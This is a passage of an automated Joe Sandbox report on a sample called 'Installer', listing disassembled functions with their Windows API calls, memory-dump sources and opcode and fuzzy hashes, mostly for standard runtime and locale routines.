                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                    • Opcode ID: bd180fe2becad37b3b9bbbae10df5dab0290f65977afa914f3cdd857468d12f5
                                                                                                                                                                                                                                                    • Instruction ID: 68c879eb25a54110ff89f2ded94ba24dd598ea910a7fce6f7cc88bb04180cf15
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd180fe2becad37b3b9bbbae10df5dab0290f65977afa914f3cdd857468d12f5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AD24E71E082288FDB66CF24DC44BEAB7B5EB48305F1586EAD40DE7244DB74AE858F41
                                                                                                                                                                                                                                                    Function 00361A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,003613BD,00000002,00000000,?,?,?,003613BD,?,00000000), ref: 00361AA0
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,003613BD,00000002,00000000,?,?,?,003613BD,?,00000000), ref: 00361AC9
                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,003613BD,?,00000000), ref: 00361ADE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                    • Opcode ID: ad050d7c7e22fa45425f15a238b0fc6c58c8b1216243c944c4516d9fb28e9408
                                                                                                                                                                                                                                                    • Instruction ID: 2ea98b674b87bdf1db4fa5ce46ef860c48b9a2afc83c2a117bc9dacec4f631cf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad050d7c7e22fa45425f15a238b0fc6c58c8b1216243c944c4516d9fb28e9408
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84218622B02101ABD737CFE5C901A9772BAEB54B54B5FC564E90ADB20CE732DD40D350
                                                                                                                                                                                                                                                    Function 00359CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                                    • Instruction ID: ca032691a71f72c14cc1531e28e5ac15cbca6907ad26b225a267cf54a867a23a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4024D71E006199BDF15CFA8C880BAEBBF1FF48315F25826AD915E7390D731AA05CB90
                                                                                                                                                                                                                                                    Function 0034F8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0034F8F5
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0034F9C1
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0034F9DA
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0034F9E4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                                                    • Opcode ID: 0c645a0111b18e338bafa2cee1cecd391fa6e923b8ea3da3f12171da7f50bec8
                                                                                                                                                                                                                                                    • Instruction ID: 138bf7a91a1b20c4f867558ebdda8feab40f320dd9812732851e6fe31b3834a4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c645a0111b18e338bafa2cee1cecd391fa6e923b8ea3da3f12171da7f50bec8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A31D775D052199BDF22DFA5D949BCDBBF8AF08300F1041AAE40DAB250EB719A848F45
                                                                                                                                                                                                                                                    Function 00361580 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003615D4
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0036161E
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003616E4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 661929714-0
                                                                                                                                                                                                                                                    • Opcode ID: 2bba436f0dcdae3cce946fc537dc2ca249dbecfad6e922fa8342c3839e0edbfe
                                                                                                                                                                                                                                                    • Instruction ID: b583f89e42aa7aa209f33d818afbb341140c27d6e6929f9c6582cfb99a41d995
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bba436f0dcdae3cce946fc537dc2ca249dbecfad6e922fa8342c3839e0edbfe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4061D2719102079FDB2A9F24CC82BBA77B8EF14701F2981B9ED05CB589E734D994DB50
                                                                                                                                                                                                                                                    Function 00357E30 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00357F28
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00357F32
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00357F3F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                    • Opcode ID: ca403ceeb616511b4ca8952af1ac2e6d533dee77bddd1ecf5e7d17df049ac25c
                                                                                                                                                                                                                                                    • Instruction ID: 72f26331597c6123a2b9fe4f5076a867911e0465513341e6c127f91c46e633f3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca403ceeb616511b4ca8952af1ac2e6d533dee77bddd1ecf5e7d17df049ac25c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6131C77491121C9BCB22DF64DC89B8DBBB8BF08311F5041EAE80DAB261E7709F858F45
                                                                                                                                                                                                                                                    Function 003500B4 Relevance: 3.0, APIs: 2, Instructions: 27timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetSystemTimePreciseAsFileTime.KERNEL32 ref: 003500EC
                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,C82EE5EC,00348E30,?,0036BE77,000000FF,?,0034FDB4,?,00000000,00000000,?,0034FDD8,?,00348E30,?), ref: 003500F0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$FileSystem$Precise
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 743729956-0
                                                                                                                                                                                                                                                    • Opcode ID: 1a9c0d5cacb4e7278b41ea325a4a754547a34ca3e65e456224b521d9f347aa15
                                                                                                                                                                                                                                                    • Instruction ID: 8fafe73069523df2e1bf02fa8f1dcf64ec4dbd3399955702cdf96d1f02155d09
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a9c0d5cacb4e7278b41ea325a4a754547a34ca3e65e456224b521d9f347aa15
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3F06532A48A58EFC7279F44DC05F9EB7ACF708B10F01412AED16937A0DB35A940DB80
                                                                                                                                                                                                                                                    Function 00353FB2 Relevance: 2.8, Strings: 2, Instructions: 318COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (=5$0
                                                                                                                                                                                                                                                    • API String ID: 0-3225634261
                                                                                                                                                                                                                                                    • Opcode ID: 978de0283461ef0397d6b3052a00d1e9e56e004519a4b6a549fa391ba8d049ce
                                                                                                                                                                                                                                                    • Instruction ID: 8b275c90efd49c89426d573c5ee53f8f470c6b08740a1d02cf98e7ebaf1c7566
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 978de0283461ef0397d6b3052a00d1e9e56e004519a4b6a549fa391ba8d049ce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33B1F83090061A8BCB2ECE68C555EBEB7B5AF0430AF25461DEE52976B0C7319ACDCB41
                                                                                                                                                                                                                                                    Function 00365C5E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00365BB9,?,?,00000008,?,?,0036BCAB,00000000), ref: 00365E8B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                                                                                    • Opcode ID: 664f0ec06631e01df631379644eac91f919c1c9ee952985b76dac37016305c5f
                                                                                                                                                                                                                                                    • Instruction ID: 482b9925fd2e971110136e76012bdd3f16f093fcb398b01bc74a7b53d3fbb21c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 664f0ec06631e01df631379644eac91f919c1c9ee952985b76dac37016305c5f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28B12A31510A09DFDB16CF28C48AB657BE0FF45364F2AC668E899CF2A5C735E991CB40
                                                                                                                                                                                                                                                    Function 0034F555 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0034F56B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                                                                                    • Opcode ID: 7e2ff42586b9c5c6f260805d9a8f210f33aeb18d77515112e1827fd7bedd9105
                                                                                                                                                                                                                                                    • Instruction ID: 73c3e841fff5b50e225b2825cd434b280751fb05199c054c1fd127fced18b6d6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e2ff42586b9c5c6f260805d9a8f210f33aeb18d77515112e1827fd7bedd9105
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFA19DB29107199FDB2ACF54D885799FBF9FB48364F29812ED419EB260C334A980CF50
                                                                                                                                                                                                                                                    Function 00361840 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00361894
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                                                                                                    • Opcode ID: 728e6dd89a433faf345152fc423d63c88f5ed6d1aa2b03d54d44c0432089f24c
                                                                                                                                                                                                                                                    • Instruction ID: 6b49340724f83314cadf05b0e1d97bda3564117a8eda287cee7190b54754aa5f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 728e6dd89a433faf345152fc423d63c88f5ed6d1aa2b03d54d44c0432089f24c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4421F232610206AFDB2A9B25CC42EBA33ACEF04715F14807AFD02CB155EB34ED44DB50
                                                                                                                                                                                                                                                    Function 003614D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00361580,00000001,00000000,?,-00000050,?,00361363,00000000,-00000002,00000000,?,00000055,?), ref: 0036154A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                                                                                                    • Opcode ID: ffb39d3e248f360fc41c2096e292891a1aea2c8d683eec68f22f3365bc825005
                                                                                                                                                                                                                                                    • Instruction ID: 7bdf9048343b20015790f3b6ec1b58f602004e63e9e79cb5c9178405c69d9547
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffb39d3e248f360fc41c2096e292891a1aea2c8d683eec68f22f3365bc825005
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33110C372007055FDB199F39C8916BAB7A1FFC0758B19842DEA4787B40E771B942C740
